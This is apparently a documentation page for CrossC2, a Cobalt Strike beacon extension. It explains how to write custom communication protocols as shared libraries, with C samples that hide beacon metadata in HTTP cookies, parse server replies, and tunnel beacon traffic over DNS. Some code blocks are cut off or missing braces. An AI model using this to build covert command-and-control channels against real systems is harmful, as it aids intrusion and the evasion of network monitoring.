Custom communication protocol

CrossC2 reserves the communication protocol API, which can be specified to implement c2profile settings and custom protocols.


After writing the corresponding communication protocol implementation, use gcc/clang test.c -fPIC -shared -o to compile and generate a dynamic library. When generating a beacon, the rebind_dynamic_lib option in cna or genCrossC2 specifies the dynamic library just generated, and the last generated beacon will send communication packets according to the protocol implementation in the specified dynamic library.

HTTPs communication template modification

Corresponding to the 4 setting options in C2Profile

http-get { 
    client(send) { metadata{} }
    server(recv) { output{} }
http-post { 
    client(send) { 
        id {} 
        output {} 
    server(recv) { output{} }
void (*cc2_rebind_http_get_send)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_get_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_send)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);

cc2_rebind_http_x_send Series functions: 
    Encapsulate the incoming base64(metadata) data and return the complete HTTP structure data
    `*reqData` Is the data to be requested after base64(metadata field)       - C2Profile http-get { client { (metadata) } } 
    `**outputData` Return the actual HTTP content that needs to be sent

cc2_rebind_http_x_recv Series functions:
    Parse the incoming HTTP structure data and return the base64(output) data
    `*resData` Is the complete HTTP content returned by the server
    `**outputData` Returns the actual content contained in the HTTP content (output field after base64 encoding)     -C2Profile http-get {server {(output)}}

Communication protocol customization

void (*cc2_rebind_get_protocol)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_post_protocol)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);

cc2_rebind_x_protocol Series functions:
    After the incoming original data is sent to and received from the custom communication, the obtained base64(output) data is returned
    `*resData` Is the data to be requested after base64 (metadata field / id + output field)
    `**outputData` It is the server response data(output field) after base64


HTTPs communication template customization:

void cc2_rebind_http_get_send(char *reqData, char **outputData, long long *outputData_len) {
    printf("------ custom http get send ------\n");
    char *requestTample = "GET /%s HTTP/1.1\r\n"
        "Accept: gzip, deflate\r\n"
        "User-Agent: cc2_rebind_http_get_send\r\n"
        "Cookie: %s\r\n"
        "Connection: cc2_rebind_http_get_send\r\n\r\n";
    char postPayload[20000];
    sprintf(postPayload, requestTample, "test", reqData);

    // Write the generated HTTP data to outputData
    *outputData_len =  strlen(postPayload);
    *outputData = (char *)calloc(1,  *outputData_len);
    memcpy(*outputData, postPayload, *outputData_len);


void cc2_rebind_http_get_recv(char *rawData, long long rawData_len, char **outputData, long long *outputData_len) {
    printf("------ custom http get recv ------\n");

    // rawData = "HTTP/1.1 200 OK
    // Date: Tue, 26 May 2020 10:12:28 GMT
    // Server: CC2_server
    // Content-Length: 32
    // Connection: close
    // Content-Type: text/html; charset=iso-8859-1

    char *payload = find_pay(rawData, rawData_len); // return "XXXXZZZZXXXXAAAZZ=="

    *outputData_len = strlen(payload);
    *outputData = (char *)calloc(1,  *outputData_len);
    memcpy(*outputData, payload, *outputData_len);


Communication protocol customization

void cc2_rebind_get_protocol(char *reqData, char **outputData, long long *outputData_len) {
    printf("------ custom get protocol ------\n");
    sendDNS("", 53, 1, reqData, strlen(reqData), outputData, outputData_len);
    if (*outputData_len > 0) {
        printf("cobaltstrike cc2_server response(%d): \n", *outputData_len);
    printf("------ custom protocol ------\n");

results matching ""

    No results matching ""